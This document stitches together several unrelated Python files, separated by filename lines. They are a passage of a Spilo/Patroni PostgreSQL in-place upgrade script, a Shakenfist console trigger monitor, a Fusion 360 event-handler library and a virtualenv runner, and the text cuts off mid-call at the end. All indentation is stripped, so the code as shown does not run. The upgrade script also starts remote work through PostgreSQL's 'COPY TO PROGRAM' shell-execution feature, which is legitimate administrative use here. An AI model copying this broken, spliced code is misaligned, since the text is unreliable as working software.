" '0/0')::bigint").format(self.postgresql.wal_name, self.postgresql.lsn_name)
status = {}
for _ in polling_loop(60):
synced = True
for name, (_, cur) in self.replica_connections.items():
prev = status.get(name)
if prev and prev >= checkpoint_lsn:
continue
cur.execute(query)
lsn = cur.fetchone()[0]
status[name] = lsn
if lsn < checkpoint_lsn:
synced = False
if synced:
logger.info('All replicas are ready')
return True
for name in self.replica_connections.keys():
lsn = status.get(name)
if not lsn or lsn < checkpoint_lsn:
                logger.error('Node %s did not catch up. Lag=%s', name, checkpoint_lsn - (lsn or 0))
def create_rsyncd_configs(self):
self.rsyncd_configs_created = True
self.rsyncd_conf_dir = '/run/rsync'
self.rsyncd_feedback_dir = os.path.join(self.rsyncd_conf_dir, 'feedback')
if not os.path.exists(self.rsyncd_feedback_dir):
os.makedirs(self.rsyncd_feedback_dir)
self.rsyncd_conf = os.path.join(self.rsyncd_conf_dir, 'rsyncd.conf')
secrets_file = os.path.join(self.rsyncd_conf_dir, 'rsyncd.secrets')
auth_users = ','.join(self.replica_connections.keys())
replica_ips = ','.join(str(v[0]) for v in self.replica_connections.values())
with open(self.rsyncd_conf, 'w') as f:
f.write("""port = {0}
use chroot = false
[pgroot]
path = {1}
read only = true
timeout = 300
post-xfer exec = echo $RSYNC_EXIT_STATUS > {2}/$RSYNC_USER_NAME
auth users = {3}
secrets file = {4}
hosts allow = {5}
hosts deny = *
""".format(RSYNC_PORT, os.path.dirname(self.postgresql.data_dir),
self.rsyncd_feedback_dir, auth_users, secrets_file, replica_ips))
with open(secrets_file, 'w') as f:
for name in self.replica_connections.keys():
f.write('{0}:{1}\n'.format(name, self.postgresql.config.replication['password']))
os.chmod(secrets_file, 0o600)
def start_rsyncd(self):
self.create_rsyncd_configs()
self.rsyncd = subprocess.Popen(['rsync', '--daemon', '--no-detach', '--config=' + self.rsyncd_conf])
self.rsyncd_started = True
def stop_rsyncd(self):
if self.rsyncd_started:
logger.info('Stopping rsyncd')
try:
self.rsyncd.kill()
self.rsyncd_started = False
except Exception as e:
return logger.error('Failed to kill rsyncd: %r', e)
if self.rsyncd_configs_created and os.path.exists(self.rsyncd_conf_dir):
try:
shutil.rmtree(self.rsyncd_conf_dir)
self.rsyncd_configs_created = False
except Exception as e:
                logger.error('Failed to remove %s: %r', self.rsyncd_conf_dir, e)
def checkpoint(self, member):
name, (_, cur) = member
try:
cur.execute('CHECKPOINT')
return name, True
except Exception as e:
            logger.error('CHECKPOINT on %s failed: %r', name, e)
return name, False
def rsync_replicas(self, primary_ip):
from patroni.utils import polling_loop
logger.info('Notifying replicas %s to start rsync', ','.join(self.replica_connections.keys()))
ret = True
status = {}
for name, (ip, cur) in self.replica_connections.items():
try:
cur.execute("SELECT pg_catalog.pg_backend_pid()")
pid = cur.fetchone()[0]
# We use the COPY TO PROGRAM "hack" to start the rsync on replicas.
# There are a few important moments:
# 1. The script is started as a child process of postgres backend, which
# is running with the clean environment. I.e., the script will not see
# values of PGVERSION, SPILO_CONFIGURATION, KUBERNETES_SERVICE_HOST
                # 2. Since direct access to the DCS might not be possible, we pass the primary_ip explicitly.
                # 3. The desired_version is passed explicitly to guarantee a 100% match with the master.
# 4. In order to protect from the accidental "rsync" we pass the pid of postgres backend.
# The script will check that it is the child of the very specific postgres process.
cur.execute("COPY (SELECT) TO PROGRAM 'nohup {0} /scripts/inplace_upgrade.py {1} {2} {3}'"
.format(sys.executable, self.desired_version, primary_ip, pid))
conn = cur.connection
cur.close()
conn.close()
except Exception as e:
logger.error('COPY TO PROGRAM on %s failed: %r', name, e)
status[name] = False
ret = False
for name in status.keys():
self.replica_connections.pop(name)
logger.info('Waiting for replicas rsync to complete')
status.clear()
for _ in polling_loop(300):
synced = True
for name in self.replica_connections.keys():
feedback = os.path.join(self.rsyncd_feedback_dir, name)
if name not in status and os.path.exists(feedback):
with open(feedback) as f:
status[name] = f.read().strip()
if name not in status:
synced = False
if synced:
break
for name in self.replica_connections.keys():
result = status.get(name)
if result is None:
                logger.error('Did not receive rsync feedback from %s after 300 seconds', name)
ret = False
elif not result.startswith('0'):
logger.error('Rsync on %s finished with code %s', name, result)
ret = False
return ret
def wait_replica_restart(self, member):
from patroni.utils import polling_loop
for _ in polling_loop(10):
try:
response = self.request(member, timeout=2, retries=0)
if response.status == 200:
data = json.loads(response.data.decode('utf-8'))
database_system_identifier = data.get('database_system_identifier')
if database_system_identifier and database_system_identifier != self._old_sysid:
return member.name
except Exception:
pass
logger.error('Patroni on replica %s was not restarted in 10 seconds', member.name)
def wait_replicas_restart(self, cluster):
members = [member for member in cluster.members if member.name in self.replica_connections]
logger.info('Waiting for restart of patroni on replicas %s', ', '.join(m.name for m in members))
pool = ThreadPool(len(members))
results = pool.map(self.wait_replica_restart, members)
pool.close()
pool.join()
logger.info(' %s successfully restarted', results)
return all(results)
def reset_custom_statistics_target(self):
from patroni.postgresql.connection import get_connection_cursor
logger.info('Resetting non-default statistics target before analyze')
self._statistics = defaultdict(lambda: defaultdict(dict))
conn_kwargs = self.postgresql.local_conn_kwargs
for d in self.postgresql.query('SELECT datname FROM pg_catalog.pg_database WHERE datallowconn'):
conn_kwargs['database'] = d[0]
with get_connection_cursor(**conn_kwargs) as cur:
cur.execute('SELECT attrelid::regclass, quote_ident(attname), attstattarget '
'FROM pg_catalog.pg_attribute WHERE attnum > 0 AND NOT attisdropped AND attstattarget > 0')
for table, column, target in cur.fetchall():
query = 'ALTER TABLE {0} ALTER COLUMN {1} SET STATISTICS -1'.format(table, column)
logger.info("Executing '%s' in the database=%s. Old value=%s", query, d[0], target)
cur.execute(query)
self._statistics[d[0]][table][column] = target
def restore_custom_statistics_target(self):
from patroni.postgresql.connection import get_connection_cursor
if not self._statistics:
return
conn_kwargs = self.postgresql.local_conn_kwargs
logger.info('Restoring default statistics targets after upgrade')
for db, val in self._statistics.items():
conn_kwargs['database'] = db
with get_connection_cursor(**conn_kwargs) as cur:
for table, val in val.items():
for column, target in val.items():
query = 'ALTER TABLE {0} ALTER COLUMN {1} SET STATISTICS {2}'.format(table, column, target)
logger.info("Executing '%s' in the database=%s", query, db)
try:
cur.execute(query)
except Exception:
logger.error("Failed to execute '%s'", query)
def reanalyze(self):
from patroni.postgresql.connection import get_connection_cursor
if not self._statistics:
return
conn_kwargs = self.postgresql.local_conn_kwargs
for db, val in self._statistics.items():
conn_kwargs['database'] = db
with get_connection_cursor(**conn_kwargs) as cur:
for table in val.keys():
query = 'ANALYZE {0}'.format(table)
logger.info("Executing '%s' in the database=%s", query, db)
try:
cur.execute(query)
except Exception:
logger.error("Failed to execute '%s'", query)
def analyze(self):
try:
self.reset_custom_statistics_target()
except Exception as e:
logger.error('Failed to reset custom statistics targets: %r', e)
self.postgresql.analyze(True)
try:
self.restore_custom_statistics_target()
except Exception as e:
logger.error('Failed to restore custom statistics targets: %r', e)
def do_upgrade(self):
from patroni.utils import polling_loop
if not self.upgrade_required:
logger.info('Current version=%s, desired version=%s. Upgrade is not required',
self.cluster_version, self.desired_version)
return True
if not (self.postgresql.is_running() and self.postgresql.is_leader()):
return logger.error('PostgreSQL is not running or in recovery')
cluster = self.dcs.get_cluster()
if not self.sanity_checks(cluster):
return False
self._old_sysid = self.postgresql.sysid # remember old sysid
logger.info('Cluster %s is ready to be upgraded', self.postgresql.scope)
if not self.postgresql.prepare_new_pgdata(self.desired_version):
return logger.error('initdb failed')
try:
self.postgresql.drop_possibly_incompatible_extensions()
except Exception:
return logger.error('Failed to drop possibly incompatible extensions')
if not self.postgresql.pg_upgrade(check=True):
return logger.error('pg_upgrade --check failed, more details in the %s_upgrade', self.postgresql.data_dir)
try:
self.postgresql.drop_possibly_incompatible_objects()
except Exception:
return logger.error('Failed to drop possibly incompatible objects')
logger.info('Enabling maintenance mode')
if not self.toggle_pause(True):
return False
logger.info('Doing a clean shutdown of the cluster before pg_upgrade')
downtime_start = time.time()
if not self.postgresql.stop(block_callbacks=True):
return logger.error('Failed to stop the cluster before pg_upgrade')
if self.replica_connections:
checkpoint_lsn = int(self.postgresql.latest_checkpoint_location())
logger.info('Latest checkpoint location: %s', checkpoint_lsn)
logger.info('Starting rsyncd')
self.start_rsyncd()
if not self.wait_for_replicas(checkpoint_lsn):
return False
if not (self.rsyncd.pid and self.rsyncd.poll() is None):
return logger.error('Failed to start rsyncd')
if self.replica_connections:
logger.info('Executing CHECKPOINT on replicas %s', ','.join(self.replica_connections.keys()))
pool = ThreadPool(len(self.replica_connections))
# Do CHECKPOINT on replicas in parallel with pg_upgrade.
# It will reduce the time for shutdown and so downtime.
results = pool.map_async(self.checkpoint, self.replica_connections.items())
pool.close()
if not self.postgresql.pg_upgrade():
return logger.error('Failed to upgrade cluster from %s to %s', self.cluster_version, self.desired_version)
self.postgresql.switch_pgdata()
self.upgrade_complete = True
logger.info('Updating configuration files')
envdir = update_configs(self.desired_version)
ret = True
if self.replica_connections:
# Check status of replicas CHECKPOINT and remove connections that are failed.
pool.join()
if results.ready():
for name, status in results.get():
if not status:
ret = False
self.replica_connections.pop(name)
member = cluster.get_member(self.postgresql.name)
if self.replica_connections:
primary_ip = member.conn_kwargs().get('host')
rsync_start = time.time()
try:
if not self.rsync_replicas(primary_ip):
ret = False
except Exception as e:
logger.error('rsync failed: %r', e)
ret = False
logger.info('Rsync took %s seconds', time.time() - rsync_start)
self.stop_rsyncd()
time.sleep(2) # Give replicas a bit of time to switch PGDATA
self.remove_initialize_key()
kill_patroni()
self.remove_initialize_key()
time.sleep(1)
for _ in polling_loop(10):
if self.check_patroni_api(member):
break
else:
logger.error('Patroni REST API on primary is not accessible after 10 seconds')
logger.info('Starting the primary postgres up')
for _ in polling_loop(10):
try:
result = self.request(member, 'post', 'restart', {})
logger.info(' %s %s', result.status, result.data.decode('utf-8'))
if result.status < 300:
break
except Exception as e:
logger.error('POST /restart failed: %r', e)
else:
logger.error('Failed to start primary after upgrade')
logger.info('Upgrade downtime: %s', time.time() - downtime_start)
try:
self.postgresql.update_extensions()
except Exception as e:
logger.error('Failed to update extensions: %r', e)
# start analyze early
analyze_thread = Thread(target=self.analyze)
analyze_thread.start()
if self.replica_connections:
self.wait_replicas_restart(cluster)
self.resume_cluster()
analyze_thread.join()
self.reanalyze()
logger.info('Total upgrade time (with analyze): %s', time.time() - downtime_start)
self.postgresql.bootstrap.call_post_bootstrap(self.config['bootstrap'])
self.postgresql.cleanup_old_pgdata()
if envdir:
self.start_backup(envdir)
return ret
def post_cleanup(self):
self.stop_rsyncd()
self.resume_cluster()
if self.new_data_created:
try:
self.postgresql.cleanup_new_pgdata()
except Exception as e:
logger.error('Failed to remove new PGDATA %r', e)
def try_upgrade(self, replica_count):
try:
self.replica_count = replica_count
return self.do_upgrade()
finally:
self.post_cleanup()
def start_backup(self, envdir):
logger.info('Initiating a new backup...')
if not os.fork():
subprocess.call(['nohup', 'envdir', envdir, '/scripts/postgres_backup.sh', self.postgresql.data_dir],
stdout=open(os.devnull, 'w'), stderr=subprocess.STDOUT)
# This function runs in a clean environment, therefore we can't rely on a DCS connection.
def rsync_replica(config, desired_version, primary_ip, pid):
from pg_upgrade import PostgresqlUpgrade
from patroni.utils import polling_loop
me = psutil.Process()
# check that we are the child of postgres backend
if me.parent().pid != pid and me.parent().parent().pid != pid:
return 1
backend = psutil.Process(pid)
if 'postgres' not in backend.name():
return 1
postgresql = PostgresqlUpgrade(config)
if postgresql.get_cluster_version() == desired_version:
return 0
if os.fork():
return 0
# Wait until the remote side closes the connection and the backend process exits
for _ in polling_loop(10):
if not backend.is_running():
break
else:
logger.warning('Backend did not exit after 10 seconds')
sysid = postgresql.sysid # remember old sysid
if not postgresql.stop(block_callbacks=True):
logger.error('Failed to stop the cluster before rsync')
return 1
postgresql.switch_pgdata()
update_configs(desired_version)
env = os.environ.copy()
env['RSYNC_PASSWORD'] = postgresql.config.replication['password']
if subprocess.call(['rsync', '--archive', '--delete', '--hard-links', '--size-only', '--omit-dir-times',
'--no-inc-recursive', '--include=/data/***', '--include=/data_old/***',
'--exclude=/data/pg_xlog/*', '--exclude=/data_old/pg_xlog/*',
'--exclude=/data/pg_wal/*', '--exclude=/data_old/pg_wal/*', '--exclude=*',
'rsync://{0}@{1}:{2}/pgroot'.format(postgresql.name, primary_ip, RSYNC_PORT),
os.path.dirname(postgresql.data_dir)], env=env) != 0:
logger.error('Failed to rsync from %s', primary_ip)
postgresql.switch_back_pgdata()
# XXX: rollback configs?
return 1
conn_kwargs = {k: v for k, v in postgresql.config.replication.items() if v is not None}
if 'username' in conn_kwargs:
conn_kwargs['user'] = conn_kwargs.pop('username')
# If we restarted Patroni right now there is a chance that it would exit due to the sysid mismatch.
# Because of the cleaned environment we can't always use the DCS on replicas in this script, therefore
# a good indicator that the initialize key was deleted/updated is the primary running after the upgrade.
for _ in polling_loop(300):
try:
with postgresql.get_replication_connection_cursor(primary_ip, **conn_kwargs) as cur:
cur.execute('IDENTIFY_SYSTEM')
if cur.fetchone()[0] != sysid:
break
except Exception:
pass
# If the cluster was unpaused before we restarted Patroni, it might have created
# the recovery.conf file and tried (and failed) to start the cluster up using the wrong binaries.
# For an upgrade to 12+, the presence of PGDATA/recovery.conf will not allow postgres to start.
# We remove the recovery.conf and restart Patroni in order to make sure it is using the correct config.
try:
postgresql.config.remove_recovery_conf()
except Exception:
pass
kill_patroni()
try:
postgresql.config.remove_recovery_conf()
except Exception:
pass
return postgresql.cleanup_old_pgdata()
def main():
from patroni.config import Config
from spilo_commons import PATRONI_CONFIG_FILE
config = Config(PATRONI_CONFIG_FILE)
if len(sys.argv) == 4:
desired_version = sys.argv[1]
primary_ip = sys.argv[2]
pid = int(sys.argv[3])
return rsync_replica(config, desired_version, primary_ip, pid)
elif len(sys.argv) == 2:
replica_count = int(sys.argv[1])
upgrade = InplaceUpgrade(config)
return 0 if upgrade.try_upgrade(replica_count) else 1
else:
return 2
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s inplace_upgrade %(levelname)s: %(message)s', level='INFO')
sys.exit(main())
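# Illustrative invocations, sketched from main() above; the version, address, pid and
# replica count below are placeholder values, not taken from a real cluster:
#
#   coordinator mode, run on the primary with the expected number of healthy replicas:
#       python3 inplace_upgrade.py 3
#
#   replica rsync mode, normally launched on a replica via COPY TO PROGRAM from the primary:
#       python3 inplace_upgrade.py 13 10.0.0.1 12345
#
# Any other argument count makes main() return 2.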
|
triggers.py
|
from functools import partial
import multiprocessing
import os
import re
import setproctitle
import signal
import time
from shakenfist import baseobject
from shakenfist.config import config
from shakenfist.daemons import daemon
from shakenfist import db
from shakenfist import etcd
from shakenfist import logutil
from shakenfist import instance
LOG, _ = logutil.setup(__name__)
def observe(path, instance_uuid):
setproctitle.setproctitle(
'%s-%s' % (daemon.process_name('triggers'), instance_uuid))
regexps = {
'login prompt': re.compile('.* login: .*'),
'user-data script start': re.compile('.*Starting.*Execute cloud user/final scripts.*'),
'user-data script end': re.compile('.*Finished.*Execute cloud user/final scripts.*'),
'cloud-init complete': re.compile('.*Reached target.*Cloud-init target.*')
}
while not os.path.exists(path):
time.sleep(1)
fd = os.open(path, os.O_RDONLY | os.O_NONBLOCK)
log_ctx = LOG.with_instance(instance_uuid)
log_ctx.with_field('path', path).info('Monitoring path for triggers')
db.add_event('instance', instance_uuid, 'trigger monitor',
'detected console log', None, None)
# Sometimes the trigger process is slow to start, so rewind 4KB to ensure
# that the last few log lines are not missed. (4KB since Cloud-Init can be
# noisy after the login prompt.)
os.lseek(fd, max(0, os.fstat(fd).st_size - 4096), os.SEEK_SET)
# Record how long the file is, because we need to detect truncations and
# re-open.
previous_size = os.stat(path).st_size
buffer = ''
while True:
# Detect file truncations, and die if we see one. We will be restarted
# by the monitor process.
if not os.path.exists(path):
return
size = os.stat(path).st_size
if size < previous_size:
return
previous_size = size
# Read data; os.read() is non-blocking here because the fd was opened with O_NONBLOCK.
d = os.read(fd, 1024).decode('utf-8', errors='ignore')
if d:
buffer += d
lines = buffer.split('\n')
buffer = lines[-1]
for line in lines:
if line:
for trigger in regexps:
m = regexps[trigger].match(line)
if m:
log_ctx.with_field('trigger', trigger,
).info('Trigger matched')
db.add_event('instance', instance_uuid, 'trigger',
None, None, trigger)
else:
# Only pause if there was no data to read
time.sleep(0.2)
class Monitor(daemon.Daemon):
def run(self):
LOG.info('Starting')
observers = {}
while self.running:
# Cleanup terminated observers
all_observers = list(observers.keys())
for instance_uuid in all_observers:
if not observers[instance_uuid].is_alive():
# Reap process
observers[instance_uuid].join(1)
LOG.with_instance(instance_uuid
).info('Trigger observer has terminated')
db.add_event(
'instance', instance_uuid, 'trigger monitor', 'crashed', None, None)
del observers[instance_uuid]
# Audit desired observers
extra_instances = list(observers.keys())
missing_instances = []
with etcd.ThreadLocalReadOnlyCache():
for inst in instance.Instances([
instance.this_node_filter,
partial(baseobject.state_filter, [instance.Instance.STATE_CREATED])]):
if inst.uuid in extra_instances:
extra_instances.remove(inst.uuid)
if inst.uuid not in observers:
missing_instances.append(inst.uuid)
# Start missing observers
for instance_uuid in missing_instances:
console_path = os.path.join(
config.STORAGE_PATH, 'instances', instance_uuid, 'console.log')
p = multiprocessing.Process(
target=observe, args=(console_path, instance_uuid),
name='%s-%s' % (daemon.process_name('triggers'),
instance_uuid))
p.start()
observers[instance_uuid] = p
LOG.with_instance(instance_uuid).info(
'Started trigger observer')
db.add_event(
'instance', instance_uuid, 'trigger monitor', 'started', None, None)
# Cleanup extra observers
for instance_uuid in extra_instances:
p = observers[instance_uuid]
try:
os.kill(p.pid, signal.SIGKILL)
observers[instance_uuid].join(1)
except Exception:
pass
del observers[instance_uuid]
LOG.with_instance(instance_uuid).info(
'Finished trigger observer')
db.add_event(
'instance', instance_uuid, 'trigger monitor', 'finished', None, None)
time.sleep(1)
# No longer running, clean up all trigger daemons
for instance_uuid in observers:
os.kill(observers[instance_uuid].pid, signal.SIGKILL)
|
events.py
|
# Event managing.
#
# Allows catching events with functions instead of classes.
# Tracks registered events and allows clean-up with one function call.
# All event callbacks are also wrapped in an error.ErrorCatcher().
#
# This file is part of thomasa88lib, a library of useful Fusion 360
# add-in/script functions.
#
# Copyright (c) 2020 Thomas Axelsson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import adsk.core, adsk.fusion, adsk.cam
import sys, time
import threading, traceback
# Avoid Fusion namespace pollution
from . import error, utils
# Try to resolve base class automatically
AUTO_HANDLER_CLASS = None
class EventsManager:
def __init__(self, error_catcher=None):
#Declared in init to allow multiple commands to use a single lib
self.handlers = []
self.custom_event_names = []
self.app, self.ui = utils.AppObjects()
self.next_delay_id = 0
self.delayed_funcs = {}
self.delayed_event = None
self.delayed_event_id = utils.get_caller_path() + '_delay_event'
self.error_catcher = error_catcher if error_catcher is not None else error.ErrorCatcher()
#Assigning
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def add_handler(self, event, base_class=AUTO_HANDLER_CLASS, callback=None):
"""`AUTO_HANDLER_CLASS` results in:
1: Getting the classType
2: Adding 'Handler' to the end
3: Splitting at '::'
4: Getting the module using the first segment
5: sets baseClass to the return of getattr using the base and all subsequent segments (should be 1)"""
if base_class == AUTO_HANDLER_CLASS:
handler_classType_name = event.classType() + 'Handler'
handler_class_parts = handler_classType_name.split('::')
base_class = sys.modules[handler_class_parts[0]]
for cls in handler_class_parts[1:]: base_class = getattr(base_class, cls)
handler_name = base_class.__name__ + '_' + callback.__name__
handler_class = type(handler_name, (base_class,), {"notify": error._error_catcher_wrapper(self, callback)})
handler_class.__init__ = lambda self: super(handler_class, self).__init__()
handler = handler_class()
handler_info = (handler, event)
result = event.add(handler)
if not result: raise Exception('Failed to add handler ' + callback.__name__)
self.handlers.append(handler_info)# Avoid garbage collection
return handler_info
def register_event(self, name):
# Unregisters to make sure there is not an old event registered due to a bad stop
self.app.unregisterCustomEvent(name)
# Registers new event
event = self.app.registerCustomEvent(name)
if event: self.custom_event_names.append(name)
return event
#Timing
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def delay(self, func, secs=0):
'''Puts a function at the end of the event queue, and optionally delays it. '''
if self.delayed_event is None:# Register the event. Will be removed when user runs clean_up()
self.delayed_event = self.register_event(self.delayed_event_id)
self.add_handler(self.delayed_event, callback=self._delayed_event_handler)
delay_id = self.next_delay_id
self.next_delay_id += 1
def waiter():
time.sleep(secs)
self.app.fireCustomEvent(self.delayed_event_id, str(delay_id))
self.delayed_funcs[delay_id] = func
if secs > 0:
thread = threading.Thread(target=waiter)
thread.daemon = True  # mark as daemon; assigning to isDaemon would not have this effect
thread.start()
else: self.app.fireCustomEvent(self.delayed_event_id, str(delay_id))
def _delayed_event_handler(self, args: adsk.core.CustomEventArgs):
delay_id = int(args.additionalInfo)
func = self.delayed_funcs.pop(delay_id, None)
if func:
    func()
#Removing
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def remove_handler(self, handler_info):
handler, event = handler_info
self.handlers.remove(handler_info)
event.remove(handler)
return None # Let user assign their handle with the return value
def remove_all_handlers(self):
for handler, event in self.handlers:
event.remove(handler)
self.handlers.clear()
def unregister_all_events(self):
for event_name in self.custom_event_names:
self.app.unregisterCustomEvent(event_name)
self.custom_event_names.clear()
def clean_up(self, oldControl = None):
"""`oldControl` is an optional variable that, if/when provided, the function: \\
`utils.clear_ui_items(oldControl)` \\
is called, which attempts to remove the control after cleanup"""
self.remove_all_handlers()
self.unregister_all_events()
if oldControl is not None: utils.clear_ui_items(oldControl)
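# A minimal usage sketch (assumes a running Fusion 360 add-in; `MY_COMMAND_ID` and
# `on_command_created` are hypothetical names, not part of this library):
#
#   events_manager = EventsManager()
#   cmd_def = events_manager.ui.commandDefinitions.itemById(MY_COMMAND_ID)
#   events_manager.add_handler(cmd_def.commandCreated, callback=on_command_created)
#   events_manager.delay(lambda: print('runs later on the main thread'), secs=2)
#   ...
#   # in the add-in's stop():
#   events_manager.clean_up()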
|
greenenv.py
|
# -*- coding: utf-8 -*-
"""
Run scripts in a clean virtual environment.
Useful for testing, building, and deploying.
:author: Andrew B Godbehere
:date: 4/21/16
"""
import venv
import sys
import os
from urllib.parse import urlparse
from urllib.request import urlretrieve
from threading import Thread
from subprocess import Popen, PIPE
import os.path
import types
import shlex
artifact_path = '.greenenv'
if not os.path.exists(artifact_path):
os.makedirs(artifact_path)
import tempfile
class ExtendedEnvBuilder(venv.EnvBuilder):
"""
This builder installs setuptools and pip so that you can pip or
easy_install other packages into the created environment.
Note: This class is from stdlib docs, with some minor modifications.
:param nodist: If True, setuptools and pip are not installed into the
created environment.
:param nopip: If True, pip is not installed into the created
environment.
:param context: Information and environment variables for the virtual environment being created
:param verbose: Flag, whether or not to show output from scripts run in environment
"""
def __init__(self, *args, **kwargs):
# self.nodist = kwargs.pop('nodist', False)
# self.nopip = kwargs.pop('nopip', False)
self.verbose = kwargs.pop('verbose', False)
self.context = None
self.python_name = None
super().__init__(*args, **kwargs)
def create(self, env_dir, python_name=None):
"""
Create a virtual environment
:param env_dir:
:param python_name:
:return:
"""
if python_name is not None:
self.python_name = python_name
else:
self.python_name = "python3"
super().create(env_dir)
return clean_env(self.context, self.verbose)
def ensure_directories(self, env_dir):
"""
Create the directories for the environment.
Note: Minor modifications made to original method from venv.
Returns a context object which holds paths in the environment,
for use by subsequent logic.
"""
def create_if_needed(d):
if not os.path.exists(d):
os.makedirs(d)
elif os.path.islink(d) or os.path.isfile(d):
raise ValueError('Unable to create directory %r' % d)
if os.path.exists(env_dir) and self.clear:
self.clear_directory(env_dir)
context = types.SimpleNamespace()
context.env_dir = env_dir
context.env_name = os.path.split(env_dir)[1]
context.prompt = '(%s) ' % context.env_name
create_if_needed(env_dir)
env = os.environ
# Note: If running this from inside a virtual environment, do some extra work to untangle from current venv.
if 'VIRTUAL_ENV' in os.environ:
vpath = os.environ['VIRTUAL_ENV']
base_binpath = os.pathsep.join(
[x for x in os.environ['PATH'].split(os.pathsep) if not x.startswith(vpath)]
)
executable = None
for p in base_binpath.split(os.pathsep):
exepath = os.path.join(p, self.python_name)
if os.path.exists(exepath):
executable = exepath
break
if not executable:
raise RuntimeError("No valid python executable discovered.")
else:
if sys.platform == 'darwin' and '__PYVENV_LAUNCHER__' in env:
executable = os.environ['__PYVENV_LAUNCHER__']
else:
executable = sys.executable
# TODO: Look for specified python distribution when outside of a virtual env when running
dirname, exename = os.path.split(os.path.abspath(executable))
context.executable = executable
context.python_dir = dirname
context.python_exe = exename
if sys.platform == 'win32':
binname = 'Scripts'
incpath = 'Include'
libpath = os.path.join(env_dir, 'Lib', 'site-packages')
else:
binname = 'bin'
incpath = 'include'
libpath = os.path.join(env_dir, 'lib',
'python%d.%d' % sys.version_info[:2],
'site-packages')
context.inc_path = path = os.path.join(env_dir, incpath)
create_if_needed(path)
create_if_needed(libpath)
# Issue 21197: create lib64 as a symlink to lib on 64-bit non-OS X POSIX
if ((sys.maxsize > 2 ** 32) and (os.name == 'posix') and
(sys.platform != 'darwin')):
link_path = os.path.join(env_dir, 'lib64')
if not os.path.exists(link_path): # Issue #21643
os.symlink('lib', link_path)
context.bin_path = binpath = os.path.join(env_dir, binname)
context.bin_name = binname
context.env_exe = os.path.join(binpath, exename)
create_if_needed(binpath)
self.context = context
return context
class clean_env:
"""
Manage a clean environment.
"""
def __init__(self, context, verbose):
self.context = context
self.verbose = verbose
def reader(self, stream):
"""
Read lines from a subprocess' output stream and either pass to a progress
callable (if specified) or write progress information to sys.stderr.
"""
while True:
s = stream.readline()
if not s:
break
if not self.verbose:
sys.stderr.write('.')
else:
sys.stderr.write(s.decode('utf-8'))
sys.stderr.flush()
stream.close()
def install_pip(self):
name = 'pip'
url = 'https://bootstrap.pypa.io/get-pip.py'
_, _, path, _, _, _ = urlparse(url)
fn = os.path.split(path)[-1]
binpath = self.context.bin_path
print("BINPATH: {}".format(binpath))
distpath = os.path.join(binpath, fn)
print("DISTPATH: {}".format(distpath))
# Download script into the env's binaries folder
urlretrieve(url, distpath)
term = ''
sys.stderr.write('Installing %s ...%s' % (name, term))
sys.stderr.flush()
# Install in the env
self.run_in_env(os.path.join(binpath, fn))
os.unlink(distpath)
# TODO: 'save' function, to save artifacts to artifact_path
# TODO: Option to run in a tmp directory, offer options to copy supporting files into directory?
# TODO: Control env vars like PATH
# TODO: Set include files/directories to copy into tmp directory
# TODO: Build python wheel with -t to specify location of wheel file
# TODO: pip options, like local path to search, --find-links...
def install_dependency(self, dep, **kwargs):
if isinstance(dep, str):
dep = [dep]
dep_str = ' '.join(dep)
kwargstr = ' '.join(["--{key} {val}".format(key=k.replace('_', '-'), val=v)
for k, v in iter(kwargs.items())])
cmd = os.path.join(self.context.bin_path, 'pip') + ' install ' + dep_str + ' ' + kwargstr
parsed_cmd = shlex.split(cmd)
print("FULL CMD: {}".format(cmd))
print("PARSED CMD: {}".format(parsed_cmd))
p = Popen(parsed_cmd, stdout=PIPE, stderr=PIPE, env=self.new_environ, cwd='.',
start_new_session=True)
t1 = Thread(target=self.reader, args=(p.stdout,))
t1.start()
t2 = Thread(target=self.reader, args=(p.stderr,))
t2.start()
p.wait()
t1.join()
t2.join()
def run_in_env(self, script):
splitscript = shlex.split(script)
p = Popen([self.context.python_exe] + splitscript, stdout=PIPE, stderr=PIPE, env=self.new_environ,
cwd='.', start_new_session=True)
t1 = Thread(target=self.reader, args=(p.stdout,))
t1.start()
t2 = Thread(target=self.reader, args=(p.stderr,))
t2.start()
p.wait()
t1.join()
t2.join()
if p.returncode != 0: # mirror nonzero return call from child process
sys.exit(p.returncode)
def __enter__(self):
# activate
if 'VIRTUAL_ENV' in os.environ:
vpath = os.environ['VIRTUAL_ENV']
base_binpath = os.pathsep.join([x for x in os.environ['PATH'].split(os.pathsep)
if not x.startswith(vpath)])
else:
base_binpath = os.environ['PATH']
self.new_environ = dict(os.environ)
self.new_environ['VIRTUAL_ENV'] = self.context.env_dir
self.new_environ['PATH'] = self.context.bin_path + os.pathsep + base_binpath
if "PYTHONHOME" in self.new_environ:
print("HAS PYTHONHOME")
self.new_environ.pop("PYTHONHOME")
self.install_pip()
return self
def __exit__(self, exc_type, exc_value, traceback):
# TODO: Optionally remove the virtual environment.
pass
if __name__ == "__main__":
env = ExtendedEnvBuilder(verbose=True)
# Note: Will always create a clean copy of current python environment.
# Relies on other tools, build systems, to iterate over multiple python executables.
with env.create('foo', 'python3.5') as fooenv:
# for k, v in iter(fooenv.context.__dict__.items()):
# print("{}: {}".format(k, v))
target_dir = os.path.expanduser("~/tmp")
print("TARGET DIR: {}".format(target_dir))
fooenv.install_dependency(
